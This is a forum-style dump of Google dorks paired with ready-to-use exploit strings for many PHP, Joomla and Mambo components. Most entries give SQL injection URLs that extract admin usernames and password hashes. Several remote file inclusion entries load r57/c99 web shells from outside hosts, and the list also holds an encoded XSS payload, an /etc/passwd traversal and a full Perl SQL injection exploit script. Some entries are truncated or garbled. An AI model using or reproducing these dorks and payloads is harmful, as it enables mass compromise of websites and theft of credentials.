- 27 Apr 2014
PHP-Nuke (Kose_Yazilari) Vulnerability
Google search: -'name Kose_Yazilari op viewarticle artid'-
Google search: -'name Kose_Yazilari op printpage artid'-
Append to the site URL: modules.php?name=-"KoseUS95Yazilari&op=viewarticle &artid=-11223344%2F%2A%2A%2Funion%2F%2A%2A%2Fselect%2F%2A% 2A%2F0,1,aid,pwd,4,5%2F%2A%2A%2Ffrom%2F%2A%2A%2Fnu keUS95authors
modules.php?name="KoseUS95Yazilari&op=printpage&ar tid=-99999999%2F%2A%2A%2FUNION%2F%2A%2A%2FSELECT%2F%2A% 2A%2F0,pwd,aid,3%2F%2A%2A%2Ffrom%2F%2A%2A%2FnukeUS 95authors
WorldTube Vulnerability
Google search: "inurl:/plugins/wordtube"
Append to the site URL: wp-content/plugins/wordtube/wordtube-button.php?wpPATH=http://shell/r57.txt?
Note: after the http:// part you need to supply your own shell address.
Joomla Component EventList Vulnerability
Google search: intext: Event List 0.8 Alpha by schlu.net
Append to the site URL: //index.php?option=com_eventlist&func=details&did=99 99999999999%20union%20select%200,0,concat(char(117 ,115,101,114,110,97,109,101,58),username,char(32,1 12,97,115,115,119,111,114,100,58),password),4,5,6, 7,8,9,00,0,444,555,0,777,0,999,0,0,0,0,0,0,0%20fro m%20jos_users/*
Powered By 6rbScript Vulnerability
Google search: Powered by 6rbScript
Com-Actualite Vulnerability
Google search: allinurl: "com_actualite"
Append to the site URL: index.php?option=com_actualite&task=edit&id=-1%20union%20select%201,concat(username,char(32),pa ssword),3,4,5,6,7,8,9%20from%20jos_users/*
Com-Mtree Vulnerability
Google search: inurl:-/com_mtree/-
Append to the site URL: http://[target]/[mambo_path]/components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_pat h=
Webring Component (component_dir) Vulnerability
Google search: inurl:com_webring
Append to the site URL: http://www.site.com/[path]/administrator/components/com_webring/admin.webring.docs.php?component_dir=http://evil_scripts?
Com-Lmo Vulnerability
Google search: "com_lmo"
Append to the site URL: $lmo_dateipfad=$mosConfig_absolute_path.-/administrator/components/com_lmo/-;
$lmo_url=$mosConfig_live_site.-/administrator/components/com_lmo/-;
Com-PonyGallery Vulnerability
Google search: inurl:"index.php?option=com_ponygallery"
Append to the site URL: //index.php?option=com_ponygallery&Itemid=x&func=vie wcategory&catid=%20union%20select%201,2,3,concat(c har(117,115,101,114,110,97,109,101,58),username,ch ar(32,112,97,115,115,119,111,114,100,58),password) ,5,0,0%20from%20jos_users/*
Com-NeoRecruit Vulnerability
Google search: inurl:index.php?option=com_NeoRecruit
Append to the site URL: //index.php?option=com_neorecruit&task=offer_view&id =99999999999%20union%20select%201,concat(char(117, 115,101,114,110,97,109,101,58),username,char(32,11 2,97,115,115,119,111,114,100,58),password),3,4,5,6 ,7,8,111,222,333,444,0,0,0,555,666,777,888,1,2,3,4 ,5,0%20from%20jos_users/*
Com-Rsfiles Vulnerability
Google search: inurl:-/index.php?option=com_rsfiles"
Append to the site URL: //index.php?option=com_rsfiles&task=files.display&pa th=..|index.php
//index.php?option=com_rsfiles&task=files.display&pa th=
Com-Nicetalk Vulnerability
Google search: inurl:index.php?option=com_nicetalk
Append to the site URL: //index.php?option=com_nicetalk&tagid=-2)%20union%20select%201,2,3,4,5,6,7,8,0,999,concat (char(117,115,101,114,110,97,109,101,58),username, char(32,112,97,115,115,119,111,114,100,58),passwor d),777,666,555,444,333,222,111%20from%20jos_users/*
Com-Joomlaradiov5 Vulnerability
Google search: inurl:"com_joomlaradiov5"
Com-JoomlaFlashFun Vulnerability
Google search: "com_joomlaflashfun"
Append to the site URL: XXX.net: The Leading XXX Site on the Net[attacker]
Carousel Flash Image Vulnerability
Google search: inurl:"com_jjgallery
Append to the site URL: http://[taget]/[Path]/administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://sibersavascilar.com/shelz/r57.txt ?
Com-Mambads Vulnerability
Google search: inurl:com_mambads
Append to the site URL:
index.php?option=com_mambads&Itemid=0&func=detail& cacat=1&casb=1&caid=999/**/Union/**/select/**/1,2,3,4,5,concat(char(117,115,101,114,110,97,109,1 01,58),username,char(32,112,97,115,115,119,111,114 ,100,58),password),7,8,9,10,11,12,13,14,15,16,17,1 8,19,20,21,22,23%20from%20mos_users/*
WebLosning Vulnerability
Dork: allinurl: "index2.php?id"
Exploit:
1 http://www.target.dk/index2.php?id=-...brugernavn,adg angskode),4,5,6+from+web1_brugere/*
2 http://www.target.dk/index2.php?id=2...ugernavn,adgan gskode),3+from+web2_brugere/*
3 http://www.target.dk/index2.php?id=-...ugernavn,adgan gskode),3,4,5,6+from+web3_brugere/*
4 http://www.target.dk/index2.php?id=-...ugernavn,adgan gskode),3,4,5,6+from+web4_brugere/*
Powered By: MFH v1 Vulnerability
Dork: "Powered by: MFH v1"
Exploitation options:
STEP 1: /members.php?folders=1&fid=-1+union+all+select+1,2,concat(user,0x3a,email),pas s,5,6,7,8+from+users+-- to get the users
STEP 2: Go to /members.php?folders=1&fid=-1+union+all+select+1,2,admin,pass,5,6,7,8+from+set ting+-- to get the admin info
STEP 3: Go to /members.php?folders=1&fid=-1+union+all+select+1,2,user,pass,5,6,7,8+from+serv er+-- to get the ftp server info (if it is configured)
W.G.C.C Vulnerability
Google dork: "Web Group Communication Center"
Exploit:
XSS:
http://[target]/[path]/profile.php?action=show&userid=%22%3E%3C%69%66%72% 61%6D%65%20%73%72%63%3D%68%74%74%70%3A%2F%2F%68%61 %2E%63%6B%65%72%73%2E%6F%72%67%2F%73%63%72%69%70%7 4%6C%65%74%2E%68%74%6D%6C%3C
Powered By Zomplog Vulnerability
Dork: "powered by zomplog"
Xcart RFI Vulnerability
Google dork: "X-CART. Powerful PHP shopping cart software"
Exploit:
site.com/[xcart-path]/config.php?xcart_dir=http://shell.txt?
site.com/[xcart-path]/prepare.php?xcart_dir=http://shell.txt?
site.com/[xcart-path]/smarty.php?xcart_dir=http://shell.txt?
site.com/[xcart-path]/customer/product.php?xcart_dir=http://shell.txt?
site.com/[xcart-path]/provider/auth.php?xcart_dir=http://shell.txt?
site.com/[xcart-path]/admin/auth.php?xcart_dir=http://shell.txt?
Vulnerability in Plugin-Class-based Systems
Google dork: index.php?loc= or allinurl:.br/index.php?loc=
Exploit:
administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path= inurl:"us/index.php?option=com_comprofiler"
Note: in the second dork you can replace the .br/ part with the country extension you want to target...
Powered By Linkspile Vulnerability
Dork: Powered By linkspile
Exploit:
http://www.example.com/link.php?cat_...x3a,password,0 x3a,0x3a,0x3a,email),8,9,10,11,12,13,14,15,16,17,1 8/**/from/**/lp_user_tb/*
The Realestate ****** Vulnerability
Dork : inurl:dpage.php?docID
Exploit : http://www.example.com/dpage.php?doc...Username,Passw ord)+from+admin
Calogic Calendars V1.2.2 Vulnerability
Dork : "CaLogic Calendars V1.2.2"
POC : http://localhost/[******_PATH]/userreg.php?langsel={SQL}
Example : http://localhost/[******_PATH]/userreg.php?langsel=1 and 1=0 UNION SELECT concat(uname,0x3a,pw) FROM clc_user_reg where uid=CHAR(49)--
Powered By PHPizabi Vulnerability
Dork: "Powered by PHPizabi v0.848b C1 HFP1"
AJ Auction 6.2.1 Vulnerability
DORK: inurl:"classifide_ad.php"
Exploit:
http://site.com/classifide_ad.php?it...assword),6,7,8, 9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25, 26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42 ,43,44,45,46,47,48,49,50,51,52,53,54/**/FROM/**/admin/**/LIMIT/**/0,1/*
Powered By Novus Vulnerability
Dork: "Powered by Novus"
Com-Mgm Vulnerability
Google dork: inurl:"com_mgm"
Exploit:
administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://megaturks.by.ru/c99.txt?
Com-Loudmounth Vulnerability
Dork: inurl:com_loudmounth
Exploit:
/components/com_loudmounth/includes/abbc/abbc.class.php?mosConfig_absolute_path=http://megaturks.by.ru/c99.txt?
Com-Thopper Vulnerability
Google dork: inurl:com_thopper or inurl:php?option=com_thopper
Exploit:
/components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://nachrichtenmann.de/r57.txt?
/components/com_thopper/inc/itemstatus_type.php?mosConfig_absolute_path=http://nachrichtenmann.de/r57.txt?
/components/com_thopper/inc/projectstatus_type.php?mosConfig_absolute_path=htt p://nachrichtenmann.de/r57.txt?
/components/com_thopper/inc/request_type.php?mosConfig_absolute_path=http://nachrichtenmann.de/r57.txt?
/components/com_thopper/inc/responses_type.php?mosConfig_absolute_path=http://nachrichtenmann.de/r57.txt?
/components/com_thopper/inc/timelog_type.php?mosConfig_absolute_path=http://nachrichtenmann.de/r57.txt?
/components/com_thopper/inc/urgency_type.php?mosConfig_absolute_path=http://nachrichtenmann.de/r57.txt?
Com-Bsq-Sitestats Vulnerability
Google dork: inurl:com_bsq_sitestats
Exploit:
/components/com_bsq_sitestats/external/rssfeed.php?baseDir=http://megaturks.by.ru/c99.txt?
Com-PeopleBook Vulnerability
Google dork: inurl:com_peoplebook
Exploit:
/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://megaturks.by.ru/c99.txt?
Joomla Component AstatsPRO Vulnerability
Dork: allinurl: "com_astatspro"
Exploit: administrator/components/com_astatspro/refer.php?id=-1/**/union/**/select/**/0,concat(username,0x3a,password,0x3a,usertype),con cat(username,0x3a,password,0x3a,usertype)/**/from/**/jos_users/*
WorkingOnWeb 2.0.1400 Vulnerability
Dork: Powered by WorkingOnWeb 2.0.1400
Exploit:
http://localhost/events.php?idevent=...ll,0,0,0,0,0,0, 0/**/from/**/mysql.user/*
Powered by cpDynaLinks Vulnerability
Dork: Powered by cpDynaLinks
connecting in http://127.0.0.1/...
[!] user: admin [!] pass: c9cb9115e90580e14a0407ed1fcf8039
use strict;
use LWP::UserAgent;
my $host = $ARGV[0];
if(!$ARGV[0]) {
print -\n
cpDynaLinks 1.02 Remote Sql Inyection exploit\n";
print -
written by ka0x - ka0x01[at]gmail.com\n";
print -
usage: perl $0 [host]\n";
print -
example: http://host.com/cpDynaLinks\n";
exit(1);
}
print -\n
connecting in $host...\n";
my $cnx = LWP::UserAgent->new() or die;
my $go=$cnx->get($host.-/category.php?category=-1'/**/union/**/select/**/1,2,3,concat(0x5f5f5f5f,0x5b215d20757365723a20,adm in_username,0x20205b215d20706173733a20,admin_passw ord,0x5f5f5f5f),5,6,7,8,9,9,9,9/**/from/**/mnl_admin/*-);
if ($go->content =~ m/____(.*?)____/ms) {
print -$1\n";
} else {
print -\n[-] exploit failed\n";
}
On the returned page, use "view source". The first lines contain the admin username and the MD5 hashes.
Maplab-2.2 Vulnerability
Dorks:
index.of /maplab-2.2
intitle:MapLab
index.of /maplab-2.2
index.of /maplab/
Exploit:
http://site.com/pathmaplab/htdocs/gm...hp?gszAppPath=[EvilScript]
Admidio 1.4.8 RFI Vulnerability
Dork : "Admidio Team"
POC : /adm_program/modules/download/get_file.php?folder=&file=../../../../../../../../../../etc/passwd&default_folder=
Example : http://demo.admidio.org/adm_program/...efault_folder=
ezContents CMS Vulnerability
Dork: "ezContents CMS Version 2.0.0"
Exploit 1:
http://site.com/[patch]/showdetails.php?contentname=--/**/union/**/select/**/1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 ,21,22,23,24,25,26,27,28,concat(login,0x3a,userpas sword,char(58,58),authoremail),30/**/from/**/authors/**/where/**/authorid=1/*
Exploit 2:
http://site.com/[patch]/printer.php?article=-/**/union/**/select/**/1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 ,21,22,23,24,25,26,27,28,concat(login,0x3a,userpas sword,char(58,58),authoremail),30/**/from/**/authors/**/where/**/authorid=1/*
SoftbizScripts Vulnerability
Dork: "inurl:Powered by SoftbizScripts" or "Subscribe Newsletter"
Exploit:
http://www.ssss.com/hostdirectory/se...php?host_id=-1 union select 1,2,concat(sb_id,0x3a,sb_admin_name,0x3a,sb_pwd),4 ,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9 ,0,1,2,3,4,5,6,7,8,9 from sb_host_admin--
This is a ****** vulnerability...
ProfileCMS v1.0 Vulnerability
Dork: "Powered By ProfileCMS v1.0" or "Total Generators & Widgets"
Exploit: http://target.com/index.php?app=prof...x3a,username,0 x3a,password,0x3a,email),4,5,6,7,8,9,10%20from%20u sers/*
target.org a,password,0x3a,email),3,4,5,6%20from%20users/*
Target.net a,password,0x3a,email),3,4,5,6%20from%20users/*
Target.net 3737764),3,4,5,6%20from%20users/*
Com-Rsgallery Vulnerability
Dork: "option=com_rsgallery" or inurl:index.php?option=com_rsgallery
Exploit: /index.php?option=com_rsgallery&page=inline&catid=-1%20union%20select%201,2,3,4,concat(username,0x3a, password),6,7,8,9,10,11%20from%20mos_users--
Returns the admin username and password hashes. This is a vulnerability found in Joomla.
Admin login: /administrator/
Kmita Tell Friend Vulnerability
Dork: "Powered by Kmita Tell Friend" or "allinurl:/kmitat/-
Exploit:
/kmitaadmin/kmitat/htmlcode.php?file=http://attacker.com/evil?
Method: shell
Redirects to the panel.
View-FAQ Vulnerability
Google dork: "allinurl:viewfaqs.php?cat=-
Exploit:
/viewfaqs.php?cat=-1%20union%20select%20concat(id,0x3a,username,0x3a, password)%20from PHPAUCTIONXL_adminusers--
Days-Booking Vulnerability
Dork: "allinurl:index.php?user=daysbooking"
Exploit:
index.php?pid=-1%20union%20select%201,concat(id,0x3a,user,0x3a,pa ssword,0x3a,access,0x3a,email),3,4,5,6,7,8,9,0,1,2 ,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7 ,8,9,0,1,2%20from%20admin--&user=det
Pn-Encyclopedia Vulnerability
Dork: allinurl:index.php?module=pnEncyclopedia
Exploit (1-2):
1- index.php?module=pnEncyclopedia&func=display_term& id=9999 union select 1,2,3,4,5,6,version(),8,9,10,11--
2- index.php?module=pnEncyclopedia&func=display_term& id=9999 union select 1,2,3,4,5,6,load_file
Gamma Scripts Vulnerability
Dork: "BlogMe PHP created by Gamma Scripts"
Exploit:
http://localhost/[BlogMe_path]/comments.php?id=-1 UNION SELECT 1,2,3,4,5,6,aes_decrypt(aes_encrypt(user(),0x71),0 x71)--
or
http://localhost/[BlogMe_path]/comments.php?id=-1 UNION SELECT 1,2,unhex(hex(database())),4,5,6,7--
ASPapp KnowledgeBase Vulnerability
Dork 1 - content_by_cat.asp?contentid -'catid'-
Dork 2 - content_by_cat.asp? -'catid'-
Exploit:
content_by_cat.asp?contentid=99999999&catid=-99887766+UNION+SELECT+0,null,password,3,accessleve l,5,null,7,null,user_name+from+users
content_by_cat.asp?contentid=-99999999&catid=-99887766+union+select+0,null,password,3,accessleve l,5,null,7,8,user_name+from+users
EmagiC CMS.Net v4.0 Vulnerability
Dork: inurl:emc.asp?pageid=
Exploit:
emc.asp?pageId=1' UNION SELECT TOP 1 convert(int, password%2b'%20x') FROM EMAGIC_LOGINS where username=-'sa'--
NOTE:
More will follow on request.